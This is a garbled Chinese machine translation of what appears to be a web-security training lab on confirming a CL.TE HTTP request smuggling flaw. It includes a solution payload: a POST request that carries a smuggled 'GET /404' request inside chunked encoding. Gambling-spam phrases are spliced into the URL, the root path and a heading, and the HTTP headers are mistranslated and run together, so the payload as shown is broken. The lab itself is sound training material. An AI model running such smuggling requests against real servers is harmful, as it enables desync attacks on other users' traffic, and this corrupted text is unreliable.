实验室:http请求走私,通过差异响应确认了cl.te漏洞
从业者
该实验室涉及前端和后端服务器,并且前端服务器不支持块状编码。
要解决实验室,请将请求走私到后端服务器,以便以后的请求/
(Web根beplay体育能用吗)触发404未找到响应。
提示
在请求走私攻击中,手动修复长度字段可能很棘手。我们的HTTP请求走私者Burp扩展旨在帮助。您可以通过BAPP商店安装它。
解决方案
使用Burp Repeater,两次发出以下请求:
post/http/1.1主机:您的lab-id.web-securbeplay体育能用吗ity-academy.net content-type:application/x-www-form-urlencoded content-engength:35传输编码:块0 get/404 http/1.1X-ignore:x
第二个请求应收到HTTP 404响应。
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)